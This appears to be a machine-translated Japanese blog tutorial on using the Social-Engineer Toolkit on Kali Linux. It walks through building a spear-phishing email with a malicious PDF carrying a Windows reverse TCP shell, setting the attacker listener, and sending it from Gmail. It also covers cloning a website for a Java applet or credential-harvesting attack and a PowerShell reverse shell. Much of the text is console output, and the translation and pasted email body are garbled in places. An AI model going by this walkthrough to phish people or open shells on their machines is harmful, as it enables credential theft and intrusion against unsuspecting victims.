SETのソーシャルエンジニアリング攻撃方法

SET(ソーシャルエンジニアツールキット)

オープンソースのソーシャルエンジニアリング利用キット。通常、metasploitと組み合わせて使用​​します。

Github:https://github.com/trustedsec/ptfですべてのツールを更新

カリ入力を入力してください

setoolkit

今すぐメインメニューから最初のアイテムを選択し、ソーシャルエンジニアリング攻撃に入ります

1.Sperar-フィッシング攻撃

フィッシング攻撃であるNo.1攻撃を選択します

set> 1

The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing>

3つのオプションがあることがわかります

1)大量メール攻撃を実行する大量メール                       攻撃
2)FileFormatペイロードを                        作成するファイル形式ペイロードを
作成する3)ソーシャルエンジニアリングテンプレートを作成して、ソーシャルエンジニアリングのテンプレート        を作成する

次に、2番目のオプションを選択します

set:phishing>2
/usr/share/metasploit-framework/

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>

上記の意味:

必要なファイル形式の脆弱性を選択してください。
デフォルトはPDF埋め込みEXEです。
**********ペイロード**********
カスタム作成のDLLハイジャック攻撃ベクトル(RAR、ZIP
)を設定します2)カスタム作成のドキュメントを設定しますUNC LM SMBキャプチャ攻撃
3)MS15- 100 Microsoft Windows Media Center MCLの脆弱性
4)MS14-017 Microsoft Word RTFオブジェクトの混乱(2014-04-01)
5)Microsoft WindowsCreateSizedDIBSECTIONスタックバッファオーバーフロー
MicrosoftWord RTF pFragmentsスタックバッファオーバーフローの脆弱性(MS10-087)
7)Adobe Flash Player 「ボタン」リモートコード実行
8)Adobe CoolType

3番目のペイロードを選択します。これにより、接続方法を選択できます。

set:payloads>3



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

ここでは、4番目のWindows64ビットTCPバウンス接続を選択します

set:payloads>4
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
set:payloads> Port to connect back on [443]:

[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...

次に、リスニングアドレスを入力するように求められます。通常、外部ネットワークを監視できるように、パブリックネットワークIPを入力する必要がありますが、これはkaliの代わりにシミュレートされたIPです。

 

しばらく待つと、ペイロードの準備が整います。2つのオプションがあります。1つは現在の名前を保持する方法、もう1つは名前を変更する方法です。

2番目を選択します

set:phishing>2
set:phishing> New filename:helloword.pdf

次に、2つのオプションがあります。メールを送信するかグループメールを送信するかを選択しましょう。ここでは最初のオプションを選択します

set:phishing>1

ここには2つのオプションがあります:1。事前定義されたテンプレート2.使い捨ての電子メールテンプレート

2番目を選びます

set:phishing>2   
set:phishing> Subject of the email:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:

次に、電子メールのコンテンツ(HTMLまたはプレーンテキスト)を入力し、pを選択して、コンテンツを入力します。

set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: 君不见黄河之水天上来,奔流到海不复回。
君不见高堂明镜悲白发,朝如青丝暮成雪。
人生得意须尽欢,莫使金樽空对月。
天生我材必有用,千金散尽还复来。
烹羊宰牛且为乐,会须䷎ext line of the body: 饮三百Next line of the body: Next line of the body: Next line of the body: 杯。
岑夫子,丹丘生,将进酒,杯莫停。
与君歌一曲,请君为我倾耳听。(倾耳听 一作:侧耳听)
钟鼓馔玉不足贵,但愿长醉不愿醒。(不足贵 一作:何足贵;不愿醒 一作:不复醒)
古来圣Next line of the body: 贤皆宎ext line of the body: Next line of the body: Next line of the body: 寞,惟有饮者留其名。(古来 一作:自古;惟 通:唯)
陈王昔时宴平乐,斗酒十千恣欢谑。
主人何为言少钱,径须沽取对君酌。
五花马、千金裘,呼儿将出换美酒,与尔同销万古愁。
Next line of the body: Next line of the body: Next line of the body: Next line of the body:

ctrl + cを押して終了し、送信するメールアドレスを入力します

set:phishing> Send email to:[email protected]

次に、メールを送信するためのアカウントを設定しましょう。最初のアイテムはGmail、2番目のアイテムは他のメールボックスを選択することですが、2番目のアイテムはSMTPで構成する必要があります。

set:phishing>1                                        
set:phishing> Your gmail email address:[email protected]
set:phishing> The FROM NAME user will see:

次に言うことは何もありません。プロンプトに従ってください。

2.ウェブサイトAttrack

   1)Javaアプレット攻撃方法
   2)Metasploitブラウザエクスプロイト方法
   3)クレデンシャルハーベスター攻撃方法
   4)タブナビング攻撃方法
   5)Webジャッキング攻撃方法
   6)マルチアタックWeb方法
   7)HTA攻撃方法

最初に選択します

set:webattack>1

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

2番目のものを選択してから、IPアドレスを入力します

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]: 


次に、どちらの方法を使用しますか

1.自分で自己署名証明書アプレットを作成します。
2.SETに組み込まれているアプレットを使用します。
3.独自のコード署名証明書またはアプレットを持っています

2を選択してから、複製されたURLを選択します

set:webattack> Enter the url to clone:

URLを入力したら、シェルのインタラクティブモードを選択しましょう

次に、最初のものを選択します

その後

場合によっては失敗することがありますが、これは制限があるためです。相手のシステムがJavaブラウザプログラムを実行している

 

次に、認証収集攻撃を行います

3つ選びます

選択肢2

その後、ユーザーがフィッシングページに入力したデータを受信できます

別の多重攻撃方法をやってみましょう

いわゆるマルチアタックとは、さまざまな攻撃方法を選択できることを意味します。

Webサイトの攻撃ディレクトリから、6を押してマルチ攻撃を入力し、いくつかのパラメータを入力して、これを入力します

実際、それは一緒に行うのは大変な作業なので、ここでは説明しません。

 

3.ワイヤレスアクセスポイント攻撃

1.ワイヤレスネットワークカードが必要

2.仮想マシンにはUSBワイヤレスネットワークカードのサポートが必要です

3.dnsハイジャックをオンにする必要があります

4.QRCodeジェネレーター攻撃

QRコード攻撃はURLに基​​づいてQRコードを生成する機能を提供し、接続コンテンツは自分で構築する必要があります

 

5.Powershell攻撃(Powershell攻撃)

WindowsシステムのPowerShell機能を活用する

下位バージョンのWindowsオペレーティングシステムはPowerShellを実行できません

PowerShellの基本についてはこちらをご覧ください

https://mp.weixin.qq.com/s/LR6OL_mARk6YBHcZAbKY3Q

 

項目9を選択し、監視IPアドレスとポート番号を入力してから、PowerShellを生成し、PowerShellを監視対象ホストに送信し、[はい]を選択して監視を開始します。

ターゲットホストでps1タイプのファイルを実行します

カリ監視ページがシェルから跳ね返った

 

他のいくつかの攻撃はここでは示されません。興味がある場合は、自分で試すことができます。

おすすめ

転載: blog.csdn.net/weixin_43198291/article/details/112210356